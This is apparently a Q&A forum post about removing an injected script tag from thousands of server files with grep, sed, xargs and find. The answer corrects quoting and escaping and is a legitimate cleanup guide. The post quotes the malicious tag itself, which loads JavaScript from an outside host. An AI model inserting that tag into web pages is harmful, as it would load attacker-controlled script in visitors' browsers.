Remove Strings from files using sed and grep

Question

we are trying to remove a single line of injection code in thousand files of our server of these thing using grep and sed:

<script type='text/javascript' src='https://dest.collectfasttracks.com/y.js'></script>

Based on our search, it seems only injected the first part of the file directly.

The code we test are:

grep -r -H "collectfasttracks" * | xargs sed -i '/<script type/=/'text/javascript/' src/=/'https/:\//dest/.collectfasttracks/.com\/y/.js/'/>/<\/script/>/d'' '{} \;

But it failed with the error:

sed: -e expression #1, char 16: extra characters after command

Perhaps we missed something in the sed command.

Kamil Maciorowski · Answer 1 · 2020-03-06T13:21:25.117

More than one issue here.

Every single-quote (') in your command is seen by the shell and removed during the quote removal phase. See the output of
```
printf '%s\n' '/<script type/=/'text/javascript/' src/=/'https/:\//dest/.collectfasttracks/.com\/y/.js/'/>/<\/script/>/d'' '{}
```
There are no single-quotes in the output, this means no single-quote got to printf. It seems you tried to escape some single-quotes with a slash (/). Problems:
- the right character to escape anything is backslash (\);
- single-quoted backslash escapes nothing anyway because there is no escaping in single-quotes, the shell considers any single-quoted string literally.
To make a single-quote character survive the quote removal phase you need to double-quote it. If you need to single-quote other parts of the string, proceed like this:
```
printf '%s\n' 'single-quoted part'"'"'single-quoted as well'"'"'and again single-quoted'
```
Here printf is just to show which quotes survive and get to the command. In practice you will use sed, xargs or whatever.

If you can afford double-quoting the entire string, it's lot more readable:
```
printf '%s\n' "double-quoted part'double-quoted as well'and again double-quoted"
```
Note double-quoted as well is double-quoted despite the neighboring single-quotes.

In your case I think you can double-quote the entire string. In general one should remember a shell parsing a double-quoted string treats backquote (`) dollar-sign ($) and backslash \ specially.
sed works with regular expressions and you seem aware you need to escape some characters (e.g. .) to make the tool treat them literally. But again you used mostly /, it has nothing to do with escaping. Surprisingly few times you used \.

Note the previous point was about escaping in the context of the shell; now we're talking about escaping in sed. These are two different issues. If you decide to double-quote the entire string then remember sometimes \ is special to the shell in the first place. Compare this question. My answer there explains how both the shell and echo can treat \ specially. In your case there's the shell and sed but in general the problem is similar because sed like echo can treat \ specially.
It seems your general idea was to use /pattern/ d script for sed. If pattern contains slashes then you need to escape them. Not only you failed in escaping them, you introduced new slashes trying to "escape" other characters. In effect the actual pattern was just <script type and the following = was the command. The tool complained about what's after =.

Your pattern contains slashes. To avoid the need for escaping them you can use another character while specifying the address. Compare this answer. E.g. the address specification can be like this:
```
\@pattern@
```
Now you don't need to escape slashes in pattern (but you need to escape @ if any).
{} is concatenated with the preceding string. The printf in my first point shows this. I guess this was not your intention.
In your code {} is just literal {}. It would be different if you used xargs -I{} … or xargs -i … but you didn't. The -i after sed is not an option to xargs.
\; (or maybe even {} \;) seems to be taken from the syntax of find … -exec … \;. If your sed didn't throw an error, it would treat ; as the name of a file to operate on.
grep -r -H … prints paths (filenames) and matching lines. You want grep -r -l … to get paths only.
* is expanded by the shell, it may trigger argument list too long error. You didn't get the error, so it's not an issue in your case. In general it can be, so using . instead of * may be a good idea. Differences:
- Expansion of * omits dot files; traversal of . does not.
- Expansion of * may pass a symlink as a command line argument to grep. By default grep -r skips symlinks unless they are provided explicitly in the command line.
If you want to use * anyway, consider ./* instead. This is important in case * expands to something that looks like an option. Or use --.
If any filename contains a newline (in general filenames can), piping such string to a command that expects filenames as lines will make the command fail or misbehave. To avoid this you want to pass names as null-terminated strings, if only the tools you use support such mode of operation. Your xargs may support -0 and your grep may support -z but it wont help because -z doesn't affect output of grep -l (at least this is the case with GNU grep in my Kubuntu; and it's not the only problem but it's enough). Instead of piping paths to xargs, sometimes it's better to use find … -exec ….
xargs interprets quotes and backslashes, unless you use -0 (if supported) or -d (if supported). Paths in general may include quotes and/or backslashes. For this reason alone you do want to use -0 even if newlines are not an issue. As stated above, grep -l doesn't generate null-terminated output, still you can use xargs -d '\n' (if -d is supported) to suppress interpretation of quotes and backslashes. This approach will not solve the problem with newlines in filenames but it will solve the problem of possible quotes or backslashes being interpreted by xargs.

Assuming you want * rather than . and there are no newlines in paths, this is the improved command:

grep -rl "collectfasttracks" ./* | xargs -d '\n' sed -i "
   \@<script type='text/javascript' src='https://dest\.collectfasttracks\.com/y\.js'></script>@ d
   "

If newlines can be an issue, a solution with find is the right one:

find ./* -type f -exec grep -q "collectfasttracks" {} \; -exec sed -i "
   \@<script type='text/javascript' src='https://dest\.collectfasttracks\.com/y\.js'></script>@ d
   " {} +

It works because -exec … \; is also a test. In this case exit status 0 from grep means the test succeeded.

Note the solution with xargs runs exactly one grep. Then xargs passes as many paths to a single sed as possible; more sed processes will be spawned if needed. This will perform very well.

The solution with find spawns one grep per any file. Thanks to -exec … {} + (as opposed to -exec … \;) the number of sed processes will be as low as with xargs, still the massive number of greps will slow the entire solution down. On the other hand this solution is very portable and not flawed when it comes to filenames (it will work with any filename(s)).

If you're sure there are many files with matches and only few files without, dropping grep may be a good idea:

find ./* -type f -exec sed -i "
   \@<script type='text/javascript' src='https://dest\.collectfasttracks\.com/y\.js'></script>@ d
   " {} +

In this case sed will process few files unnecessarily, yet it may be faster than spawning one grep per file for many files.

Warning: All the above solutions are able to pass multiple arguments (paths to files) to sed. This is good for performance but my tests (with GNU sed 4.4) indicate that a problem with one file (e.g. inability to create a temporary file) may make the tool abort and not process remaining files. To process files totally independently you need one sed per file. You achieve this by … | xargs -n 1 … sed … or find … -exec sed … {} \; (i.e. \; instead of +).

Remove Strings from files using sed and grep

1 Answers1